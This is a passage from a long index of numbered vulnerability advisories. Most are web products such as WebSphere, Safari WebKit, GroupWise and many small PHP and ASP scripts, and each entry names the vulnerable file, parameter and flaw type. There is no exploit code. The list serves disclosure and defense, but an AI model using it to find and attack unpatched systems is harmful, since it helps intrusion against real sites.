DoS [55079] IBM WebSphere Multiple Products Migration IsSecurityEnabled Flag Unspecified Repository Information Disclosure [55078] IBM WebSphere Application Server (WAS) Security Component LTPA Token Timeout Policy Bypass [55077] IBM WebSphere Application Server (WAS) Administrative Console Component Configservice API Unspecified Information Disclosure [55076] IBM WebSphere Application Server (WAS) System Management/Repository Component wsadmin Unspecified Issue [55075] IBM WebSphere Application Server (WAS) Security Component Non-standard HTTP Methods Unspecified Issue [55074] IBM WebSphere Application Server (WAS) Administrative Console Component Secure Login Page HTTP Access Weakness [55061] IBM WebSphere MQ Queue Manager Crafted Request Remote Overflow [55057] Apache APR-util xml/apr_xml.c apr_xml_ Interface Expat XML Parser Crafted XML Document Remote DoS [55045] FreeBSD IPv6 SIOCSIFINFO_IN6 IOCTL Unprivileged Interface Property Manipulation [55027] Apple Safari WebKit JavaScript Application RNG Prediction Weakness [55023] Apple Safari WebKit Web Inspector HTML Attribute Handling XSS [55022] Apple Safari WebKit Arbitrary Local Java Applet Access [55015] Apple Safari WebKit Attr DOM Object Handling Arbitrary Code Execution [55014] Apple Safari WebKit Transparent Custom Cursor / CSS3 Hotspot Browser UI Element Spoofing [55013] Apple Safari WebKit SVG Animation Element Set.targetElement() Use-after-free Arbitrary Code Execution [55012] Apple Safari on Windows Reset Safari Implementation Stored Web Password Persistence [55009] Apple Safari WebKit Audio / Video HTML Element Handling Information Disclosure [55008] Apple Safari WebKit JavaScript dir Attribute DOM Handling Use-after-free Arbitrary Code Execution [55007] phpWebThings help.php module Parameter Traversal Arbitrary File Access [55006] Apple iPhone / Safari WebKit CSS attr() Function Uninitialized Pointer Issue Arbitrary Code Execution [55005] Apple Safari WebKit Canvas Redirect Cross-site Image Disclosure [55004] Apple Safari WebKit Crafted Canvas SVG Cross-site Image Capture [54996] Apple Safari Web Inspector Page Inspection XSS [54994] WebKit Drag Event Handling Information Disclosure [54993] Apple Safari WebKit Location / History Objects XSS [54992] Apple Safari WebKit XMLHttpRequest Header Handling CRLF Injection [54991] Apple Safari WebKit Page Transition Frame Content Access XSS [54989] Apple Safari WebKit Cross-Domain JavaScript Prototype XSS [54988] Apple Safari WebKit about:blank Security Context Race Condition XSS [54987] Apple Safari WebKit JavaScript Context Splitting Event Handler Subsequent Frame XSS [54986] Apple Safari WebKit Script Security Context Association Implementation Failure Unspecified XSS [54985] Apple Safari WebKit JavaScript Garbage Collector Allocation Failure NULL Pointer Arbitrary Code Execution [54984] WebKit 'ConstDeclNode::handleSlowCase' Function JavaScript Exception Handling Memory Corruption [54983] Apple Safari WebKit JavaScript Contexts Separation XSS [54981] Apple Safari WebKit Same-origin Policy Bypass Subframe Positioning Clickjacking [54975] Apple Safari WebKit XSLT document() Function Information Disclosure [54973] Apple Safari WebKit XSLT Redirect Handling Information Disclosure [54972] Apple Safari WebKit XML External Entity (XXE) Data Parsing Arbitrary File Disclosure [54928] Kerio MailServer WebMail Component Integration Page XSS [54894] A-LINK WL54AP3 / WL54AP2 Management Interface Default Admin Account Password [54888] Web Directory PRO admin/backup_db.php Direct Request Database Backup Disclosure [54872] Sun Java System Web Server Reverse Proxy Plug-in Unspecified XSS [54871] Webform Module for Drupal Multiple Parameter Unspecified XSS [54867] WebEyes Guest Book yorum.asp mesajid Parameter SQL Injection [54858] Flash Quiz results_table_web.php quiz Parameter SQL Injection [54857] Flash Quiz high_score_web.php quiz Parameter SQL Injection [54850] WebCal webCal3_detail.asp event_id Parameter SQL Injection [54837] IBM WebSphere Application Server (WAS) Traversal Error Page XSS [54826] Ston3D WebPlayer system.openURL() Function Shell Metacharacter Remote Command Execution [54816] DMXReady Registration Manager databases/webblogmanager.mdb Direct Request Database Disclosure [54742] WebMember form.php formID Parameter SQL Injection [54728] Novell GroupWise gw/webacc Multiple Parameter XSS [54727] IBM WebSphere Partner Gateway (WPG) bcgarchive Schema DB2 Instance ID Unspecified Remote Information Disclosure [54678] Profense Web Application Firewall Negative Model Implementation Weakness SCRIPT Element XSS [54677] Profense Web Application Firewall Encoded Newline Request Positive Model Protection Bypass [54676] Profense Web Application Firewall Default Password Hash Weakness [54662] phpWebNews bukutamu.php det Parameter SQL Injection [54661] phpWebNews index.php id_kat Parameter SQL Injection [54655] Realty Web-Base list_list.php id Parameter SQL Injection [54643] Novell GroupWise WebAccess /gw/webacc Login Page Multiple Parameter XSS [54642] Novell GroupWise WebAccess Mail Service Scripting Attack Authentication Bypass [54641] Novell GroupWise WebAccess Unfiltered Style Expressions XSS [54640] Novell GroupWise WebAccess Session Management Mechanism Bypass [54635] Web Conference Room Free Unspecified XSS [54626] Open WebMail (OWM) E-mail Multiple Content Header XSS [54622] webadmin.php show Parameter Arbitrary File Access [54590] MyABraCaDaWeb Invalid Parameter Error Message Path Disclosure [54580] ClanWeb admincp/save.php Admin Account Manipulation Access Restriction Bypass [54555] Microsoft IIS WebDAV Unicode URI Request Authentication Bypass [54551] ContentKeeper Web .htaccess Misconfiguration Authentication Bypass [54500] WebKit SVGList::insertItemBefore Function Memory Corruption [54455] Apple Safari WebKit SVGList Object Handling Memory Corruption [54436] TinyWebGallery /admin/_include/init.php lang Parameter Traversal Local File Inclusion [54372] Realty Web-Base admin/admin.php Multiple Parameter SQL Injection [54367] RTWebalbum index.php AlbumId Parameter SQL Injection [54310] Webstore Creator admin.asp Multiple Parameter SQL Injection [54301] dWebPro file.asp::$DATA HTTP Request Handling Arbitrary File Access [54300] dWebPro HTTP Request Handling Traversal Arbitrary Directory Access [54296] webSPELL awards.php page Parameter SQL Injection [54295] webSPELL src/func/language.php language Cookie Local File Inclusion [54285] ZoneAlarm TrueVector Component Proxied Web Traffic HIDS Module DoS [54270] AREVA e-terrahabitat WebFGServer Application Unspecified Remote Privilege Escalation [54268] AREVA e-terrahabitat WebFGServer Application Unspecified Remote DoS (PD32020) [54267] AREVA e-terrahabitat WebFGServer Application Unspecified Remote DoS (PD32018) [54254] Glassfish Enterprise Server Admin Console /webService/webServicesGeneral.jsf URI XSS [54236] IBM WebSphere Application Server (WAS) snoopservlet Path Disclosure [54233] IBM Tivoli Storage Manager (TSM) Agent Client (dsmagent.exe) WebGUI Unspecified Overflow [54228] IceWarp Merak Mail Server webmail.php Search Query XML Data SQL Injection [54217] QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion [54184] Fritz!Box cgi-bin/webcm Port Forwarding CSRF [54147] MPC SoftWeb Guestbook mpcsoftweb_guestdata.mdb Direct Request Database Disclosure [54146] MPC SoftWeb Guestbook insertguest.asp Multiple Parameter XSS [54136] Precidia Ether232 Web Server GET Request Handling Memory Corruption DoS [54128] webSPELL picture.php id Parameter Traversal Arbitrary File Access [54126] @mail webadmin/admin.php Multiple Parameter XSS [54121] WebPortal CMS indexk.php lib_path Parameter Remote File Inclusion [54120] WebPortal CMS index.php error Parameter Traversal Local File Inclusion [54119] WebPortal CMS libraries/helpdocs/help.php lang Parameter Traversal Arbitrary File Access [54094] CGI Rescue Web Mailer Unspecified CRLF Injection [54093] Apache ActiveMQ Web Console JMS Message XSS [54063] DMXReady Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS [54062] DMXReady Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection [54019] LooYu Web IM newCusChat.js XSS [54018] LooYu Web IM newVisitorChat.js XSS [54000] XBMC xbmc/lib/libGoAhead/WebServer.cpp websHomePageHandler() Function Overflow [53995] Nokia IPSO Voyager WebGUI readfile.tcl file Parameter Arbitrary File Access [53990] IBM WebSphere Application Server (WAS) ibm_security_logout Servlet logoutExitPage Feature Arbitrary Site Redirect [53985] Novell GroupWise WebAccess HTML Attachment Unspecified XSS [53984] Novell GroupWise WebAccess HTML E-mail Unspecified XSS [53983] Novell GroupWise WebAccess gw/webacc Multiple Parameter XSS [53982] Novell GroupWise WebAccess Unspecified Information Disclosure [53981] Novell GroupWise WebAccess Multiple Unspecified Admin Function CSRF [53979] IBM WebSphere Application Server (WAS) WebContainer Component Unspecified CRLF Injection [53937] Novell Teaming Liferay Portal web/guest/home Multiple Parameter XSS [53935] Xitami Web Server on Windows HTTP Request Connection Saturation Remote DoS [53923] webClassifieds sAuth Cookie Manipulation Authentication Bypass [53918] FreeBSD libc db(3) Interface Local Information Disclosure [53914] Keller Web Admin CMS Public/index.php action Parameter Traversal Local File Inclusion [53826] EZ Webitor login.php Multiple Parameter SQL Injection [53799] HR Web Add On mss/index.asp app_username Parameter SQL Injection [53787] Web File Explorer body.asp id Parameter SQL Injection [53782] webSPELL Multiple BBCode Tags XSS [53781] WebCollab User Credential Manipulation CSRF [53780] WebCollab tasks.php selection Parameter XSS [53768] Zervit Webserver libz/misc.c http_parse_hex() Function Overflow [53767] Oracle BEA WebLogic Portal Unspecified Remote Issue [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow [53765] Oracle BEA WebLogic Server Plug-ins for Web Servers Unspecified Remote Overflow [53764] Oracle BEA WebLogic Server Web Services Unspecified Remote Issue [53763] Oracle BEA WebLogic Server Servlet Container Unspecified Remote Issue (CVE-2009-1002) [53762] Oracle BEA WebLogic Server Servlet Container Unspecified Remote Issue (CVE-2009-1003) [53711] Beanwebbs Guestbook /guestbook/admin.php Unrestricted Admin Access [53710] Beanwebbs Guestbook add.php Multiple Parameter XSS [53708] FreeWebShop.org includes/startmodules.inc.php lang_file Parameter Traversal Local File Inclusion [53689] DivX Web Player STRF Chunk Handling Overflow [53659] IBM BladeCenter Advanced Management Module Admin Interface Arbitrary User Permission Disclosure [53638] Yellow Duck Weblog include/languages/check.php lang Parameter Traversal Local File Inclusion [53636] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Web Proxy TCP State Handling DoS [53635] XEROX WorkCentre Web Server Unspecified Command Injection [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53616] DotNetNuke Website\admin\Sales\paypalipn.aspx Unspecified Parameter XSS [53610] WebCalendar long.php user_inc Parameter Traversal Arbitrary File Access [53588] DiViS-Web ActiveView DvsNDKEx.dll ActiveX (ActiveView.cab) Multiple Method Overflow [53539] GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution [53538] GIT gitweb git_snapshot / git_object Shell Metacharacter Arbitrary Command Execution [53536] WowWee Rovio /webcam Unauthenticated RTSP Audio/Video Access [53493] Alt-N WebAdmin Name Parameter Arbitrary File Access [53485] Web Wiz Siste News /news/news.mdb Direct Request User Database Disclosure [53465] nweb2fax viewrq.php var_filename Parameter Traversal Arbitrary File Access [53464] nweb2fax comm.php id Parameter Traversal Arbitrary File Access [53463] nweb2fax viewrq.php var_filename Parameter Shell Metacharacter Arbitrary Remote Code Execution [53454] Sybase Enterprise Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53453] Pramati Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53452] Orion Application Server Crafted Request WEB-INF Directory Information Disclosure [53451] jo! jo Webserver on Windows Crafted Request WEB-INF Directory Information Disclosure [53450] HP Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53449] Macromedia JRun Crafted Request WEB-INF Directory Information Disclosure [53431] IBM Tivoli Storage Manager (TSM) Web Admin Client Unspecified Memory Access Violation Remote DoS [53424] Web Help Desk Full Name Field XSS [53423] Web Help Desk Asset No. Field XSS [53422] Web Help Desk Report Name Field XSS [53420] WebFileExplorer db.mdb Direct Request Database Disclosure [53419] OpenGoo Web Link Addition webpage[url] Parameter Arbitrary Code Injection [53414] Cisco Linksys WRT160N Admin Interface CSRF [53377] 53KF Web IM msg Parameter XSS [53372] Uebimiau Webmail demo/pop3/error.php selected_theme Parameter Traversal Arbitrary Directory Enumeration [53354] talentsoft Web+ webplus.exe Path Disclosure [53347] WebMod Period File Request Script Source Disclosure [53346] WebMod parser.cpp auth.w Arbitrary Memory Overwrite [53345] WebMod Cookie Parameter Handling Remote Overflow [53344] WebMod GET Request Traversal Arbitrary File Access [53343] Google Chrome JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53342] Apple Safari JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53341] Mozilla Firefox JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53340] Microsoft IE JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53334] Apple Mac OS X XNU HFS vfs sysctl Interface HFS_SET_PKG_EXTENSIONS Code Path Local Memory Consumption DoS [53310] Fujitsu-Siemens WebTransactions Unspecified Demo Application XSS [53308] Apple Safari on Windows WebKit.dll ALINK Attribute Handling Memory Exhaustion DoS [53291] Azureus WebUI index.tmpl CSRF [53290] uTorrent WebUI /gui/ Multiple Action CSRF [53274] IBM WebSphere Application Server (WAS) Username Truncation Authentication Bypass (PK70943) [53273] IBM WebSphere Application Server (WAS) System Management/Repository Component File Transfer Servlet Remote Information Disclosure (PK59108) [53272] IBM WebSphere Application Server (WAS) Web Server Plug-in Content Buffering Unspecified DoS (PK63499) [53271] IBM WebSphere Application Server (WAS) Java Message Service (JMS) IBM Asynchronous I/O Multiple Method DoS (PK64529) [53270] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Performance Monitoring Infrastructure (PMI) Unspecified DoS (PK64697) [53269] IBM WebSphere Application Server (WAS) Unspecified JSP Source Code Disclosure (PK23670) [53268] IBM WebSphere Application Server (WAS) Admin Console Forced Logout Session Hijack (PK74966) [53267] IBM WebSphere Application Server (WAS) Traversal Arbitrary JSP Inclusion (PQ85045) [53253] IBM WebSphere Application Server (WAS) Web Services Security Component XML Digital-signature Specification Unspecified Issue [53252] IBM WebSphere Application Server (WAS) Interim Fix File Permission Weakness [53251] IBM WebSphere Application Server (WAS) Web Services Security Component JAX-RPC WS-Security UsernameToken Object Validation Unspecified Issue [53247] Dillo Web Browser SSL Certificate Verification Failure [53238] HP OpenView Network Node Manager (OV NNM) webappmon.exe Arbitrary Code Execution [53202] aspWebCalendar calendar/calendar.mdb Direct Request Credentials Disclosure [53200] Check Point FireWall-1 PKI Web Service Multiple HTTP Header Handling Overflow [53197] Asbru Web Content Management login.asp url Parameter XSS [53196] Asbru Web Content Management page.asp id Parameter SQL Injection [53184] Softwebs Nepal Chat Software Login Name XSS [53161] Sun Java System Identity Manager Admin Interface Arbitrary User Password Modification [53147] Cisco ASA5520 WebVPN /+webvpn+/index.html Host HTTP Header XSS [53093] Web Server Creator news/include/createdb.php langfile Parameter Remote File Inclusion [53075] GNOME Banshee DAAP Extension apps/web/vs_diag.cgi server Parameter XSS [53068] WebEdition webEdition/index.php WE_LANGUAGE Parameter Traversal Local File Inclusion [53066] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) SaveViewToSessionFile Method Overflow [53002] Amaya Web Browser Script Tags defer Attribute Handling Overflow [52970] Ipswitch WhatsUp Gold Web Server localhostnull Log Viewer Authentication Bypass [52969] Ipswitch WhatsUp Gold Web Server Crafted Request ASP File Content Disclosure [52962] Nokia N95 Browser setAttributeNode Method Web Page Handling DoS [52951] Xitami Web Server Server Side Includes (SSI) Request Processing Remote Format String [52950] Xitami Web Server LRWP Request Processing Remote Format String [52935] Amaya Web Browser CheckUniqueName Function Duplicated Attribute Value Inputs Overflows [52924] Microsoft IIS WebDAV PROPFIND Method Forced Directory Listing [52915] WebCit mini_calendar Component Unspecified Format String [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS [52849] HP Embedded Web Server (EWS) hp/device/set_config_password.html/config Multiple Parameter CSRF [52848] HP Embedded Web Server (EWS) hp/device/config_result_YesNo.html/config NetIPChange Request CSRF [52847] HP Embedded Web Server (EWS) Print Documents Unspecified CSRF [52829] IBM WebSphere Application Server (WAS) Integrated Solutions Console URI XSS [52816] Kim Websites login.php Multiple Parameter SQL Injection [52777] Sitecore CMS Web Service Security Database Information Disclosure [52769] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified XSS [52768] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified DoS [52767] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified Overflow [52766] Fujitsu Jasmine2000 Enterprise Edition WebLink Template HTTP Response Splitting [52756] Cisco Unified MeetingPlace Web Conferencing Crafted URL Handling Unspecified Admin Authentication Bypass [52707] Atlassian JIRA Enterprise Edition Webwork 1 Framework Dynamic URL Transformation Security Bypass [52680] Microsoft IIS httpext.dll WebDav LOCK Method Nonexistent File Request Parsing Memory Exhaustion Remote DoS [52620] IBM WebSphere Application Server (WAS) WAR File Handling Source Disclosure (PK81387) [52608] IBM WebSphere Application Server (WAS) for z/OS CSIv2 Identity Assertion / JEB Functionality Unspecified Local Issue [52607] IBM WebSphere Partner Gateway (WPG) Crafted RosettaNet (aka RNIF) Document Signature Verification Bypass [52605] IBM WebSphere DataPower XML Security Gateway XS40 Malformed Data over SSL Remote DoS [52603] IBM WebSphere Application Server (WAS) Web Services JAX-WS Client Cache UsernameToken Disclosure [52602] IBM WebSphere Application Server (WAS) Security Component Multiple Unspecified Issues (PK71786) [52601] IBM WebSphere Application Server (WAS) Web Authentication Options Multiple Unspecified Issues (PK71826) [52600] IBM WebSphere Application Server (WAS) Web Services WSPolicy IDAssertion.isUsed SOAP Message Password Disclosure [52599] IBM WebSphere Application Server (WAS) on Windows JSP Handling Unspecified Exposure (PK75248) [52598] IBM WebSphere Application Server (WAS) Unspecified SSL Traffic Routing Weakness [52597] IBM WebSphere Application Server (WAS) Web Services Security Feature Pack userNameToken Unspecified Exposure [52596] IBM WebSphere Application Server (WAS) Web Services Security Nonce / Timestamp Expiration Enforcement Weakness [52595] IBM WebSphere Application Server (WAS) PMI/Performance Tools PerfServlet Multiple Log File Information Disclosure [52539] Aryanic HighPortal includes/web_search.aspx q Parameter XSS [52538] Aryanic HighCMS includes/web_search.aspx q Parameter XSS [52531] IBM WebSphere Process Server (WPS) Admin Console Cluster Configuration File Export Information Disclosure [52526] WEBJump! news_id.php id Parameter SQL Injection [52525] WEBJump! portfolio_genre.php id Parameter SQL Injection [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52510] Dotclear Administration Interface Unspecified XSS [52468] IBM WebSphere Application Server (WAS) on Windows Installation Factory logs/instconfigifwas6.log Local Information Disclosure [52465] Moodle User Editing Interface Unspecified Remote Privilege Escalation [52402] IBM WebSphere Application Server (WAS) /ibm/console/ URI XSS [52401] Sofi WebGui hu/modules/reg-new/modstart.php mod_dir Parameter Remote File Inclusion [52389] Cisco Unified MeetingPlace Web Conferencing Profile Page E-mail Address Field XSS [52372] Cisco Multiple Wireless Products w/ Webauth Vulnerability Scan Remote DoS [52369] Academic Web Tools download.php Multiple Parameter XSS [52368] Academic Web Tools login.php Multiple Parameter XSS [52367] Academic Web Tools page_arch.php Multiple Parameter XSS [52366] Academic Web Tools page.php Multiple Parameter XSS [52347] Cambium Group CMS Web Form Arbitrary Mail Relay [52345] Easy File Sharing Web Server thumbnail.ghp vfolder Parameter Traversal Arbitrary File Access [52336] Galatolo WebManager (GWM) Multiple Cookie Manipulation Admin Authentication Bypass [52297] IBM WebSphere MQ (WMQ) Queue Manager Multiple Authorization Command Local Privilege Escalation [52295] ZNC Webadmin Module znc.conf QuitMessage Field Security Restriction Bypass [52276] Multi Languages WebShop Online detail.php name Parameter XSS [52275] Multi Languages WebShop Online detail.php id parameter SQL Injection [52261] ASPThai.Net Webboard bview.asp id Parameter SQL Injection [52189] IBM WebSphere Message Broker Event / System Log Local Database Password Disclosure [52187] DVR4-SecuraNet HTTP Interface Default Admin Credentials [52151] mlmmj contrib/web/perl-user Unspecified Injection [52018] Trend Micro InterScan Web Security Multiple Products Proxy-Authorization Header Remote Information Disclosure [51993] WebBiscuits Modules Controller adminhead.php path[docroot] Parameter Remote File Inclusion [51924] phpWebSite links.php cid Parameter SQL Injection [51922] FAST ESP Management Interface Unspecified XSS [51906] Agavi AgaviWebRouting::gen(null) Method XSS [51899] Den Dating Website Script searchmatch.php txtlookgender Parameter SQL Injection [51881] Trend Micro InterScan Web Security Suite Multiple JSP Pages Admin Authentication Bypass [51872] WebFrame base/menu.php classFiles Parameter Remote File Inclusion [51871] WebFrame index.php classFiles Parameter Remote File Inclusion [51870] WebFrame admin/doc/index.php classFiles Parameter Remote File Inclusion [51869] WebFrame mod/index.php Multiple Parameter Traversal Local File Inclusion [51867] Blue Coat K9 Web Protection functions.js Manipulation Privilege Escalation [51865] SmartMax MailMax/Web Cookie Application Path Disclosure [51855] FotoWeb Grid.fwx search Parameter XSS [51854] FotoWeb Login.fwx s Parameter XSS [51833] BlackBerry Application Web Loader ActiveX (AxLoader) Overflow [51831] WEBalbum photo.php id Parameter SQL Injection [51830] HP JetDirect HP-ChaiSOE Web Server Unspecified Administration Component Traversal Arbitrary File Access [51777] Meet#Web RegRightsResource.class.php root_path Parameter Remote File Inclusion [51776] Meet#Web RegResource.class.php root_path Parameter Remote File Inclusion [51775] Meet#Web RegForm.class.php root_path Parameter Remote File Inclusion [51774] Meet#Web ManagerRightsResource.class.php root_path Parameter Remote File Inclusion [51773] Meet#Web ManagerResource.class.php root_path Parameter Remote File Inclusion [51772] Meet#Web modules.php root_path Parameter Remote File Inclusion [51743] NaviCOPA Web Server Crafted HTTP Request Handling PHP Source Code Disclosure [51742] NaviCOPA Web Server GET Request Handling Overflow [51732] Google Chrome Current Session Cleartext Web Sites Credential Disclosure [51722] BRS WebWeaver FTP Aborted RETR Command Remote DoS [51663] IBM WebSphere Application Server (WAS) Admin Console /ibm/console/outputRedirectDetail.do Multiple Parameter Arbitrary File Access [51660] Profense Web Application Firewall ajax.html Multiple CSRF [51659] Profense Web Application Firewall proxy.html proxy Parameter XSS [51627] SAP NetWeaver / Web DynPro Unspecified XSS [51624] Web-Calendar Lite main.asp Multiple Parameter SQL Injection [51618] Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS [51617] Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection [51611] WebSVN listing.php repname Parameter Remote File Access [51604] Sun Java System Application Server Multiple Directory Web Application Configuration File Remote Access [51601] PHP JOBWEBSITE PRO siteadmin/forgot.php Multiple Parameter XSS [51600] PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection [51573] Polycom ViaVideo Web Server HTTP GET Request Remote Overflow [51572] Polycom ViaVideo Web Server Incomplete HTTP Connection Saturation Remote DoS [51571] Web Help Desk Helpdesk.woa Encoded JavaScript XSS [51568] IBM Domino Web Access Upload Module (inotes6.dll) SEH Overwrite [51550] Discussion Web _private/discussion.mdb Direct Request Password Disclosure [51541] WebSVN utils.inc create_anchors Function Arbitrary PHP Code Execution [51505] RoundCube Webmail HTML Background Attribute XSS [51498] WebAmoeba Ticket System Component for Joomla! index.php catid Parameter SQL Injection [51492] OLIB7 WebView cgi/ URI infile Parameter Information Disclosure [51464] Velocity Security Management System Web Server Traversal Arbitrary File Access [51398] Cisco IronPort Products Admin Interface CSRF Arbitrary Command Execution [51397] Cisco IronPort Products Admin Interface CSRF User Preference Manipulation [51366] Oracle BEA WebLogic Server /reviewService/createArtist_session.jsp XSS [51365] Oracle BEA WebLogic Server /reviewService/InterceptorClientServlet XSS [51363] Oracle BEA WebLogic Server /reviewService/examplesWebApp/JWS_WebService.jsp XSS [51362] Oracle BEA WebLogic Server /reviewService/addReview_service.jsp rating Parameter XSS [51361] Oracle BEA WebLogic Server reviewService/addBooks_session_ejb21.jsp title Parameter XSS [51360] Oracle BEA WebLogic Server /reviewService/createArtist_service.jsp Multiple Parameter XSS [51316] Oracle BEA WebLogic Portal Administration Console Unspecified XSS [51314] Oracle BEA WebLogic Server / Express Console Unspecified Privilege Escalation [51313] Oracle BEA WebLogic Server / Express JSP Servlets Unspecified Information Disclosure [51312] Oracle BEA WebLogic Server / Express Web Services Unspecified Policy Bypass [51311] Oracle BEA WebLogic Plug-in For Multiple Web Servers HTTP Request Remote Overflow DoS [51266] StanWeb.CMS default.asp id Parameter SQL Injection [51238] Horde Webmail addevent.php url Parameter XSS [51181] Webutil webutil.pl Arbitrary Command Execution [51162] SolucionWeb main.php id_area Parameter SQL Injection [51081] Pixel8 Web Photo Album Photo.asp AlbumID Parameter SQL Injection [51077] AlstraSoft Web Email Script Enterprise index.php id Parameter SQL Injection [51076] Site2Nite Real Estate Web agentlist.asp SQL Injection [51015] webClassifieds index.php Multiple Parameter SQL Injection [50985] F5 BIG-IP Web Management Console tmui/Control/form CSRF [50971] Sun Java Web Console console/faces/jsp/login/BeginLogin.jsp redirect_url Parameter Arbitrary Site Redirect [50954] Opera HTML Parsing Engine Crafted Web Page Arbitrary Code Execution [50940] Iltaweb Alisveris Sistemi urunler.asp catno Parameter SQL Injection [50918] GIT gitweb/gitweb.perl diff.external Configuration Variable Crafted Query Local Privilege Escalation [50915] Extract Website download.php filename Parameter Traversal Arbitrary File Access [50896] WEBERkommunal Facilities Extension for TYPO3 Unspecified SQL Injection [50884] WebcamXP Unspecified URL-encoded Traversal Arbitrary File Access [50879] RoundCube Webmail Crafted Quota Image Size Parameter Memory Consumption DoS [50871] Phpclanwebsite index.php page Parameter XSS [50870] Phpclanwebsite pcw/downloads.php Multiple Parameter SQL Injection [50869] Phpclanwebsite pcw/setlogin.php pcwlogin Parameter SQL Injection [50868] Phpclanwebsite pcw/processforms.php form_id Parameter SQL Injection [50867] Phpclanwebsite index.php page Parameter SQL Injection [50866] Phpclanwebsite phpclanwebsite/footer.php theme Parameter Traversal Local File Inclusion [50865] Phpclanwebsite theme/superchrome/box.php boxname Parameter Traversal Local File Inclusion [50864] Fujitsu-Siemens WebTransactions Temporary Session Crafted HTTP Request Arbitrary Command Execution [50790] Kerio MailServer WebMail error413.php sent Parameter XSS [50789] Kerio MailServer WebMail calendarEdit.php daytime Parameter XSS [50788] Kerio MailServer WebMail mailCompose.php folder Parameter XSS [50771] Dr.Web Anti-virus HTML Document MZ Header Multiple Filename Modification Malware Detection Bypass [50757] Secure Computing Secure Web Gateway HTML Document MZ Header Multiple Filename Modification Malware Detection Bypass [50745] Microsoft Office Web Controls OWC11.DataSourceControl Memory Access Violation [50742] CMS ISWEB index.php Multiple Parameter XSS [50741] CMS ISWEB index.php Multiple Parameter SQL Injection [50720] IBM WebSphere Portal BasicAuthTAI Function Unspecified Access Restriction Bypass [50706] Promise NAS NS4300N Web GUI usercp.php user Parameter Arbitrary Account Password Manipulation [50694] RoundCube Webmail bin/html2text.php preg_replace Function Remote PHP Code Execution [50655] Webmaster Marketplace member.php u Parameter SQL Injection [50643] IBM Rational ClearQuest CQ Web Unspecified XSS [50640] IBM Rational ClearQuest MultiSite Web Crafted jtl.properties File Client Submission Redirection [50631] Cisco Linksys WVC54GC NetCamPlayerWeb11gv2 ActiveX (NetCamPlayerWeb11gv2.ocx) SetSource Method Arbitrary Code Execution [50613] Microsoft IE WebDAV Cached Content Request Parsing Overflow [50602] WebCAF index.php Multiple Parameter Traversal Local File Inclusion [50601] WebCAF modules/view.php view Parameter Traversal Local File Inclusion [50571] PhPepperShop Webshop shop/Admin/SHOP_KONFIGURATION.php URL XSS [50570] PhPepperShop Webshop shop/Admin/shop_kunden_mgmt.php URL XSS [50569] PhPepperShop Webshop shop/kontakt.php URL XSS [50568] PhPepperShop Webshop index.php URL XSS [50514] Sun Java JDK / JRE Java Web Start BasicService Arbitrary File Access [50512] Sun Java JDK / JRE Jave Web Start / Plug-in HTTP Session Hijacking [50511] Sun Java JDK / JRE Java Web Start SingleInstanceImpl Class SI_FILEDIR Property Application Information Enumeration [50510] Sun Java JDK / JRE Java Web Start (JWS) JNLP File System Properties Override File Inclusion [50509] Sun Java JDK / JRE Java Web Start Application file: Protocol Arbitrary File Access [50497] Sun Java JDK / JRE Java Web Start Application JNLP File Handling Socket Restriction Bypass [50479] WebGUI Web View Mail Attachments Program Execution [50471] Abyss Web Server GET Request Remote Overflow [50468] Bandwebsite info.php section Parameter XSS [50467] Bandwebsite lyrics.php id Parameter SQL Injection [50466] WebStudio CMS index.php pageid Parameter SQL Injection [50445] Webboard Street connect.inc Direct Request Database Disclosure [50444] Webboard Street show.php id Parameter SQL Injection [50425] WebWasher ARJ Decoder Malformed Archive Handling DoS [50423] Webhosting Component for Mambo / Joomla! index.php catid Parameter SQL Injection [50415] Active Web Mail login.aspx password Parameter SQL Injection [50400] Active Web Helpdesk default.aspx CategoryID Parameter SQL Injection [50382] eWebquiz start.asp Multiple Parameter SQL Injection [50296] Blender BPY_interface sys.path Search Path Subversion Local Privilege Escalation [50288] Apple iPhone Configuration Web Utility for Windows Traversal Arbitrary File Access [50201] WebStudio eHotel index.php pageid Parameter SQL Injection [50200] WebStudio eCatalogue index.php pageid Parameter SQL Injection [50125] IBM Tivoli Access Manager WebSEAL webseald Daemon Crafted HTTP Message Handling Remote DoS [50111] Trend Micro ServerProtect RPC Interface Unspecified Administrative Access [50106] Xe webtv Component for Joomla! index.php id Parameter SQL Injection [50022] MiniWebsvr GET Request Traversal Arbitrary File Access [50018] IBM Workplace Web Content Management Unspecified XSS [49999] Pi3Web ISAPI Directory File Request Error Message Path Disclosure [49998] Pi3Web ISAPI Directory File Request Remote DoS [49875] PromoteWeb MySQL go.php id Parameter SQL Injection [49848] AlstraSoft Web Host Directory Login Script pwd Parameter SQL Injection [49839] TurnkeyForms Web Hosting Directory admin/backup/db Direct Request Database Disclosure [49838] TurnkeyForms Web Hosting Directory adm Cookie Manipulation Admin Authentication Bypass [49824] WEBBDOMAIN Post Card admin/admin.php username Parameter SQL Injection [49823] WEBBDOMAIN Post Card choosecard.php catid Parameter SQL Injection [49818] buymyscripts.net Recipe Website Script search.php keyword XSS [49802] com_weblinks Component for Joomla! Weblink Submission Multiple Parameter XSS [49784] IBM WebSphere Application Server (WAS) Web Services Certificate Store Collections Certificate Revocation Lists Bypass [49782] IBM WebSphere Application Server (WAS) HTTP 